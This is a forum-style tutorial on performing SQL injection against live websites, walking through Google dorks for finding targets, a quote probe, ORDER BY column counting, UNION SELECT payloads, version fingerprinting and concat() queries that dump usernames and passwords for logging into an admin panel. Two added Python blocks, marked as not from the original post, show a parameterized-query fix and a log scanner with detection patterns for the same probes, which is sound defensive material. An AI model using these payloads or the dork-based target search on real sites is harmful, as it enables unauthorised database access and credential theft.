Hey guys! Today I'm going to explain
SQL Injection and how to perform an
SQL Injection attack on a website.
Let's start off by getting an understanding
of what SQL Injection is.
Quote:A SQL injection attack consists of insertion or
"injection" of a SQL query via the input data from the
client to the application. A successful SQL injection
exploit can read sensitive data from the database,
modify database data (Insert/Update/Delete), execute
administration operations on the database (such as
shutdown the DBMS), recover the content of a given file
present on the DBMS file system and in some cases issue
commands to the operating system. SQL injection attacks
are a type of injection attack, in which SQL commands
are injected into data-plane input in order to effect
the execution of predefined SQL commands.
Finding A Vulnerable Target
Okay, let's start looking for a site if you
don't already have one. You can use
something called "Google Dorks" to find
pages of a site that may be vulnerable.
Type one of these into Google to do this:
Code:
inurl:admin.php?p=
inurl:contact.php?ID=
inurl:help.php?id=
You can find many more @ http://1337mir.com/hacking/2013/10/googl...injection/
An example would be a site like: http://www.example.com/contact.php?id=6
If you already have a site in mind, you can use
an SQLi dumper to test whether any of its pages
are vulnerable, trying all the Google dorks
at once. This is an example of "Pen-Testing".
Testing For Vulnerabilities
Once you have found the site
you wish to SQL inject, you'll obviously
need to test whether it is vulnerable. To do
this you can type ' at the end of the
URL. Like this: http://www.example.com/shop.php?id=6'
If it is in fact vulnerable, it will
show an error similar to "You have an error in your SQL syntax".
If the page is not vulnerable, it
shouldn't show an error and will
most likely just reload as before.
Finding Column Count
Now we need to find the number of columns
in the query behind the page. To do this
we can use the "ORDER BY" statement.
At the end of the link you type order by 1/*
and keep going up (2/*, 3/*, 4/*, etc.) until
you get an error.
Code:
http://www.example.com/contact.php?id=6 order by 1/* no error
http://www.example.com/contact.php?id=6 order by 2/* no error
http://www.example.com/contact.php?id=6 order by 3/* no error
http://www.example.com/contact.php?id=6 order by 4/* no error
http://www.example.com/contact.php?id=6 order by 5/* error
Once you get that error, you know the column count
is the last value that did not error. In the
example above, the page has 4 columns because
order by 5 was the first link that gave an error.
Checking the UNION Function
UNION lets you append the rows of a second SELECT
to the first in one SQL statement, as long as both
return the same number of columns (if I'm wrong then tell me).
So to use UNION you type union all
select 1,2,3,4/*. I went up to 4 because that is
how many columns the site I'm attacking has;
if there were 33 columns, you would type
union all select 1,2,... up to 33.
Code:
http://www.example.com/contact.php?id=6 Union all select 1,2,3,4/*
If /* doesn't work, you can replace it with --
If you see the numbers on screen, that means the
UNION works.
Checking For MySQL Version
Let's check the MySQL version. Assume that when checking the
UNION, the number 3 appeared on the screen. To detect the version,
we replace the 3 in our query with @@version or version(). Like:
Quote:http://www.example.com/contact.php?id=6 union all select 1,2,@@version/*
You should now have a version number. An example could be : 4.13.37
Getting table and column names
We will need to guess the table names now.
Some common table names are: admins, users, members, emails, user.
Common column names: users, user, password, pass, etc.
You can test them by entering them into the link. Like:
Quote:http://www.example.com/contact.php?id=6 Union all select 1,2,3,4 from Tablename/*
If you see the number 3 again, the
table exists; now we need the
column name. We do this:
Quote:http://www.example.com/contact.php?id=6 Union all select 1,2,user,4 from tablename/*
If usernames are displayed, it works; if an error occurs, try another column.
Once the names are displayed, you would then look for emails, passwords, etc.
Now we want to get the usernames and passwords at the same time. To do this we use concat(), which joins the strings.
Quote:http://www.example.com/contact.php?id=6 Union all select 1,2,concat(username,0x3a,password),4 from tablename/*
0x3a is the hex value for ":"
Now you should get the username and password in a nice format.
Example: (User:Pass)
Quote:Admin:qwerty
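Everything above works because the page pastes the id parameter straight into the SQL text. As an added example that is not from the original post, the following Python script reproduces a contact.php-style lookup against a constructed in-memory SQLite database (the contacts and users tables, the Admin/qwerty row and the function names are assumptions) and puts the parameterized form beside it: the same inputs that error or leak against the first version are treated as plain data by the second. Suppressing error messages only hides the symptom; binding the parameter removes the cause.

```python
import sqlite3


def build_demo_db():
    """Constructed sample database standing in for the site's backend (assumption, not from the post)."""
    con = sqlite3.connect(":memory:")
    con.executescript("""
        CREATE TABLE contacts (id INTEGER PRIMARY KEY, name TEXT, email TEXT);
        CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT);
        INSERT INTO contacts VALUES (6, 'Sales desk', 'sales@example.com');
        INSERT INTO users VALUES (1, 'Admin', 'qwerty');
    """)
    return con


def lookup_vulnerable(con, raw_id):
    """The pattern behind a page like contact.php?id=6: the raw parameter becomes part of the SQL text."""
    query = f"SELECT name, email FROM contacts WHERE id = {raw_id}"
    return con.execute(query).fetchall()


def lookup_parameterized(con, raw_id):
    """Hardened form: the value is bound as a parameter, so it can never change the statement."""
    return con.execute("SELECT name, email FROM contacts WHERE id = ?", (raw_id,)).fetchall()


def probe(fn, con, raw_id):
    """Run one lookup and report ('error', message) or ('rows', rows) so both versions can be compared."""
    try:
        return ("rows", fn(con, raw_id))
    except sqlite3.Error as exc:
        return ("error", str(exc))


if __name__ == "__main__":
    db = build_demo_db()
    # The trailing quote from "Testing For Vulnerabilities" and the UNION from later on,
    # using the -- comment the post mentions as the alternative to /*.
    for value in ("6", "6'", "6 union all select username, password from users -- "):
        print(repr(value), "vulnerable:", probe(lookup_vulnerable, db, value))
        print(repr(value), "parameterized:", probe(lookup_parameterized, db, value))
```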
Now you can log in to the Admin
Panel!! From here on it's up to you. Thanks
for reading my tutorial. Have Fun!
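Seen from the server side, the probe sequence in this tutorial (the trailing quote, the climbing order by, union all select, @@version) leaves a recognisable trail in the web server's access log. As an added example that is not from the original post, this Python snippet scans constructed Apache combined-format log lines, URL-decodes each query string and reports which step of the sequence a request matches; the IP addresses, timestamps and pattern names are assumptions.

```python
import re
from urllib.parse import unquote_plus

# Constructed access-log lines (Apache combined format) replaying the probe steps from the tutorial.
SAMPLE_LOG = """\
203.0.113.7 - - [10/Oct/2013:12:00:01 +0000] "GET /contact.php?id=6 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
203.0.113.7 - - [10/Oct/2013:12:00:05 +0000] "GET /contact.php?id=6' HTTP/1.1" 500 312 "-" "Mozilla/5.0"
203.0.113.7 - - [10/Oct/2013:12:00:09 +0000] "GET /contact.php?id=6%20order%20by%205/* HTTP/1.1" 500 312 "-" "Mozilla/5.0"
203.0.113.7 - - [10/Oct/2013:12:00:14 +0000] "GET /contact.php?id=6%20union%20all%20select%201,2,@@version,4/* HTTP/1.1" 200 5200 "-" "Mozilla/5.0"
198.51.100.2 - - [10/Oct/2013:12:01:00 +0000] "GET /contact.php?id=7 HTTP/1.1" 200 5100 "-" "Mozilla/5.0"
"""

# Client IP, timestamp, request line and status code from the combined format.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<uri>\S+) [^"]*" (?P<status>\d{3})'
)

# One pattern per step of the tutorial's probe sequence (names are assumptions).
PROBES = {
    "quote_probe": re.compile(r"'\s*$"),
    "order_by_probe": re.compile(r"\border\s+by\s+\d+", re.I),
    "union_select": re.compile(r"\bunion\s+(all\s+)?select\b", re.I),
    "version_fingerprint": re.compile(r"@@version|\bversion\(\)", re.I),
}


def flag_sqli_probes(log_text):
    """Return (ip, uri, status, matched_probe_names) for every request matching at least one probe."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        # Decode percent-encoding so "order%20by" and "order by" are treated alike.
        query = unquote_plus(m.group("uri").partition("?")[2])
        matched = [name for name, rx in PROBES.items() if rx.search(query)]
        if matched:
            hits.append((m.group("ip"), m.group("uri"), int(m.group("status")), matched))
    return hits


if __name__ == "__main__":
    for hit in flag_sqli_probes(SAMPLE_LOG):
        print(hit)
```

A burst of 500 responses from one client followed by a 200 on a union request is the pattern worth alerting on, since it is exactly the transition from "error" to "numbers on screen" the tutorial describes.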